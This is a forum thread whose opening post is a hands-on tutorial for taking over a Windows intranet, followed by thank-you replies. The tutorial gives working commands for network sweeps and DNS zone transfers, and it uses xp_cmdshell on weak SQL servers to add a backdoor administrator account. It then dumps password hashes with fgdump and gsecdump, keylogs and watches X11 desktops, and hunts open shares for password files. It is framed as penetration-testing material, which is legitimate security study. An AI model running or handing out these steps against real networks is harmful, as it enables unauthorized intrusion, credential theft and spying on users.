Results 1 to 9 of 9

Thread: Tutorial : Intranet Exploitation

  1. #1
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default Tutorial : Intranet Exploitation

    This tutorial will demonstrate how to gain Domain Administrator on a typical Windows intranet through common security oversights. Most of these tools are Windows based, but may run in Wine. Please post if you can verify this, or if you know a Linux equivalent tool.

    Discovery

    Obviously start with the network you've been DHCP'd.

    NET VIEW command

    Displays a list of computers in a specified workgroup or the shared resources available on a specified computer.

    [\\computername [/CACHE] | /DOMAIN[:domainname]]

    Code:
    NET VIEW /NETWORK:NW [\\computername]

    Domain Zone Transfers

    Starting with the DNS servers you DHCP'd with, try to zone transfers. If successful, extrapolate Class C (/24) networks from the individual IP addresses.

    Code:
    dig @ns1.example.com example.com axfr

    Nmap scanning

    Perform a ping sweep of the network range.

    Code:
    nmap -sP -v xx.xx.xx.xx/24 > ping_results.txt
    Clean up the ping sweep.

    Code:
    cat ping_results.txt | grep -i 'up' | cut --delimiter=" " -f 2 > ping_results_final.txt
    Generate IP list from the know net ranges

    Code:
    gping xx.xx.0.255 >> iplist.txt gping xx.xx.0.255 >> iplist.txt
    gping may be found here:
    http://forums.remote-exploit.org/showthread.php?t=11988

    Exploitation

    SQL Discovery and Exploitation

    A common entry point to a network is through unsecure SQL servers. SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. It also adds brute-force password capabilities and the ability to brute-force multiple instances.

    It can be found here:

    http://www.sqlsecurity.com/Tools/Fre...5/Default.aspx

    Once you have found a weak SA account, use the command-line OSQL tool found bundled with MSDE. This is the syntax to create an account and promote it to a local administrator:
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net user pwnd pwndABC123 /add'"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "xp_cmdshell 'net localgroup administrators pwnd /add'"

    With newer releases of SQL, you may find that the xp command shell has been disabled. Thoughtfully, Microsoft allows you to re-enable this feature!
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'show advanced options', 1"
    osql -S %servername% -U %username% -P %password% -t 15 -b -Q "EXEC sp_configure 'xp_cmdshell', 1"

    As a local administrator, you can now dump the HASHES for the local workstation. Use FGDump, found here:

    http://swamp.foofus.net/fizzgig/fgdump/downloads.htm

    Syntax:
    fgdump -h %hostname% -u pwnd -p pwndABC123

    If FGDump doesn't work, try GSECDump, found here:

    http://www.truesec.com/PublicStore/c...ookieSupport=1

    GSECDump should be used with psexec, found here:
    http://technet.microsoft.com/en-us/s.../bb897553.aspx

    Syntax:
    psexec \\%hostname% -u pwnd -p pwndABC123 -s -f -c gsecdump.exe -s


    X11 exploitation

    If your nmap scans reveal port 6000-6005 being open, chances are you may be dealing with the X11 protocol (X Windows). X11 is plain-text and can be keylogged and remotely viewed. You will need the NSAT (Network Security Analysis Tool) which can be found here:

    http://forums.remote-exploit.org/showthread.php?t=12312

    You may find that the tool does not complete a make. Download my fixed version towards the bottom of the post.

    Filter your nmap results to only show ports 6000-6005 and copy the results into a text file. NSAT will scan the hosts in this text file. Syntax:

    nsat -C nsat_X.conf -n -f iplist.txt

    The results should show something similar to this:

    [port] 10.1.1.1 - X Windows
    [port] 10.1.1.2 - dumpable/sniffable

    Target the IP's that are "dumpable/sniffable" with XSpy, found here:

    http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html

    Syntax:

    ./xspy 10.1.1.2:0

    You should now be keylogging this session. If you want to view the actual desktop of the user, use xwatchwin, found here:

    ftp://ftp.x.org/contrib/utilities/

    Syntax:

    ./xwatchwin 10.1.1.2:0

    FTP exploitation

    Utilizing NSAT, filter your nmap results for port 21. Take this IP list and run it through NSAT.
    Syntax:
    nsat -C nsat_FTP.conf -n -f iplist.txt

    The results should show something similar to this:

    10.1.1.1 - anonymous login
    10.1.1.2 - anonymous login


    Share Enumeration

    A common security flaw occurs when users define file shares with lax security, allowing unauthorized users to see sensitive files. ShareEnum looks for these open shares on the network. You can find it here:

    http://www.microsoft.com/technet/sys...shareenum.mspx

    NetworkSleuth is a network file searching utility, that allows you to quickly locate files across a network. You can search for specific file names or for specific file types (e.g. files named/containing password). Get it here:

    http://www.nsauditor.com/network_sleuth.html

    I hope this helps some of you with your pen-testing endeavors. Please add to this tutorial with your own methodologies.

    William

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Thanks for the tutorial williamc. Officially though I have to move it to general IT because it is not based on backtrack. Nothing personal I'm just following the rules.

  3. #3
    Member s1lang's Avatar
    Join Date
    Sep 2007
    Posts
    189

    Default

    Thank you for this mate

  4. #4
    Just burned his ISO
    Join Date
    May 2008
    Posts
    20

    Default

    Thanks for the tutorial

  5. #5
    Member
    Join Date
    Feb 2006
    Posts
    167

    Default thanks

    Ran across this, nice job thanks.

  6. #6
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.

  7. #7
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by williamc View Post
    Updated. Now you can use xp command shell on newer SQL installations that have it disabled by default.
    Very nice work, brother. It's glad to see that knowledge isn't just being hoarded for personal gain, but is being shared for all the right reasons. Neophytes take heed: this is the kind of example you, and even those of us more versed in the security realm, should all follow....

    I look forward to any and everything else you have to offer.



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  8. #8
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Default Thannks man

    Dude...

    Thanks for sharing, well written tuts like this have me just itching to try out some new tools.

    Time to break my home network,again...

    TT

  9. #9
    Good friend of the forums
    Join Date
    Jan 2010
    Location
    outside chicago, il
    Posts
    442

    Default

    Nice work williamc. SQLPing looks interesting.

    I added a section on gsecdump to the password cracking guide.
    I like the bleeding edge, but I don't like blood loss

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •